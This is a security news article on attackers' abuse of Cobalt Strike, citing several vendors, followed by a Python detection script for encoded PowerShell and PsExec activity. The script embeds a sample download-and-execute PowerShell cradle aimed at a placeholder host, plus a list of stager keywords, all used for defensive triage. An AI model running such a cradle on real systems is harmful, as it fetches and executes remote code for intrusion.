Incident response cases and studies have shown that red team tools have become the first choice of attackers.
RSA CONFERENCE 2021 - For the past two decades, the open source Metasploit hacking platform has been a source of both enthusiasm and frustration for security teams, who need tools to test their own networks but also worry that cybercriminals and other bad actors will turn those same tools against them.
Today, Metasploit is still popular among good and bad hackers alike, but another red team tool, Cobalt Strike, is increasingly playing a major role in attacks. Attackers are using customized, cloned, or even purchased versions of Cobalt Strike to get into victims' networks and are weaponizing it as a second-stage tool for delivering payloads (including Metasploit exploits).
The threat emulation software suite, used for penetration testing, was created by researcher Raphael Mudge in 2012 and was acquired by HelpSystems last year. The component most popular with malicious hackers is Beacon, which operates as an agent on the compromised host: running PowerShell scripts, logging keystrokes, capturing screenshots, stealing files, and dropping other payloads or malware.
HelpSystems declined to comment for this article.
New data from Sophos, which categorizes attacker behaviors and their tools, techniques, and procedures (TTPs), shows that Cobalt Strike was one of the top five tools used by attackers in the cases its threat hunters and incident responders worked last year and in the first half of 2021. It is also a key factor when attackers use PowerShell commands to disguise their activity on the victim's network: nearly 60% of PowerShell abuse cases involved Cobalt Strike, and about 12% of attacks used a combination of Cobalt Strike and the Microsoft Windows tools PowerShell and PsExec. According to Sophos' latest "Active Adversary Playbook 2021" report, Cobalt Strike was also paired with PsExec in nearly a third of attacks.
John Shier, a senior security consultant at Sophos, said: "Cobalt Strike lends itself to deployment via PowerShell. The [Cobalt Strike] code was leaked on the Internet a long time ago, [attackers] know how to use it, and this is an evasion technique" that lets them stay under the radar as the attack escalates and spreads.
One of the most notable uses by attackers was by the Russian GRU hacker group behind the SolarWinds supply chain attack, which built custom shellcode loaders that dropped the Cobalt Strike payload: the Teardrop and Raindrop malware components of that attack.
Researchers and incident responders at Intel 471 said the malicious use of Cobalt Strike is tied to the rise of ransomware in recent years, but it is also used to drop other types of malware and to steal data. Malware families that use Cobalt Strike include Trickbot, Hancitor, Qbot, SystemBC, Smokeloader, and Bazar. The researchers today released indicators of compromise linking Cobalt Strike to these malware families.
Intel 471 CISO Brandon Hoffman said attackers seem to like the features of Cobalt Strike, especially the Beacon component. "From the perspective of an exploited tool, it has a lot of built-in functionality; it is well suited to the second stage of an attack. You don't need to pick and choose among various malware, you only need to drop it and you get all of its functions," he said.
The tool also includes a "malleable" command-and-control (C2) feature, which lets an attacker model its C2 traffic after that of different threat-actor groups. "Malleable C2 lets you imitate behaviors or make C2 traffic look like almost any legitimate service," he said. So, for example, if an organization allows users to stream Pandora, the malleable C2 could be disguised as Pandora traffic inside the victim's network.
"This makes it extremely difficult to detect attacks," Hoffman said. "Beacons are so customizable."
Even so, experts say there are still ways to detect malicious abuse of Cobalt Strike. Beyond the bad guys making mistakes and leaving clues or breadcrumbs, if you are monitoring activity you can spot a Cobalt Strike-driven attack in progress. "[In some cases], if you find something on a command-and-control server that may be a beacon, that's one way. If you create a YARA rule for some malicious script, you can also detect it," Hoffman explained.
"Where you saw Cobalt Strike in the wild, some people reused it for the same malware family," Hoffman said. His team today published its findings, including indicators of compromise, on the cybercriminal groups deploying Cobalt Strike.
"We have seen a correlation between the rise in the use of Cobalt Strike [by adversaries] and the rise of ransomware," Hoffman said. "We are not saying that Cobalt Strike contributed to ransomware. Rather, ransomware is dropped in the later stages of the attack chain. Before getting to ransomware, attackers first have to deploy something like [Cobalt Strike]. So discovering this activity before the ransomware is installed can save a lot of trouble."
Speaking of ransomware, Sophos' IR and threat hunting data found ransomware in more than 80% of the incidents they investigated. "Ransomware is noisy and demands attention," said Sophos' Shier, which is why these cases get flagged for investigation. "[In] many of the attacks we have stopped, we have also discovered Cobalt Strike activity," he said.
Red Canary researchers have also found attackers using Cobalt Strike in targeted attacks, including payment card theft and ransomware campaigns. They described incidents in which an attacker using the Bazar malware deployed the Cobalt Strike payload before dropping Ryuk ransomware on the victim, with the whole sequence completed within two hours.
"Cobalt Strike is so common and reliable that adversaries can successfully create their own custom tooling simply to deploy its payloads, knowing that they can get those payloads past security controls. This feature demonstrates how Cobalt Strike fits into the threat models of almost all organizations alike," according to Red Canary's report, which includes detailed information on methods for detecting malicious Cobalt Strike operations.
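The two detection angles the article raises, PowerShell-based deployment that hides behind encoded commands and the Cobalt Strike plus PsExec pairing Sophos counted, can be checked in process-creation telemetry. The script below is an added example written for this page; it is not code from the article, Sophos, Intel 471, or Red Canary. Its input events are constructed for the example, the `-EncodedCommand` abbreviation regex and the keyword list are this example's assumptions about what to look for, and the one-liner it encodes points at the reserved `example.invalid` name.

```python
import base64
import re

# Constructed PowerShell one-liner, used only to build the sample event below.
# It follows the textbook download-and-run shape that detection teams key on,
# pointed at a reserved, non-routable name.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"


def encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation events (made up for this example, not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"parent": "PSEXESVC.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(CONSTRUCTED_SCRIPT)},
    {"parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe"},
]

# Assumption: -EncodedCommand and its common abbreviations, followed by the Base64 blob.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden", re.I)
# Keywords that commonly appear in download-and-execute PowerShell stagers (assumed list).
CRADLE_KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String", "WebClient")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: still worth a human look, but not decodable here


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; returns the flags raised and the decoded script."""
    flags = []
    decoded = None
    cmd = event["cmdline"]
    if event["image"].lower() == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            flags.append("encoded_command")
        if HIDDEN_FLAG.search(cmd):
            flags.append("hidden_window")
        # Look for cradle keywords in both the raw command line and the decoded script,
        # so encoding alone does not hide them from the check.
        haystack = (cmd + " " + (decoded or "")).lower()
        if any(k.lower() in haystack for k in CRADLE_KEYWORDS):
            flags.append("download_cradle")
        # PsExec runs remote commands through its PSEXESVC service; PowerShell spawned
        # from it matches the Cobalt Strike + PsExec pairing the article describes.
        if event["parent"].lower() == "psexesvc.exe":
            flags.append("psexec_parent")
    return {"flags": flags, "decoded": decoded}


def triage(events):
    """Return (index, flags, decoded) for every event that raised at least one flag."""
    hits = []
    for i, ev in enumerate(events):
        r = analyze_event(ev)
        if r["flags"]:
            hits.append((i, r["flags"], r["decoded"]))
    return hits


if __name__ == "__main__":
    for i, flags, decoded in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(flags)}")
        if decoded:
            print("  decoded:", decoded)
```

Only the second event is flagged: the benign PowerShell invocation and the PsExec service process on their own raise nothing, while the encoded, hidden-window PowerShell spawned by PSEXESVC.exe collects all four flags. In practice the decoded script is what an analyst reads next, and each flag maps naturally onto a detection rule of its own rather than one monolithic signature.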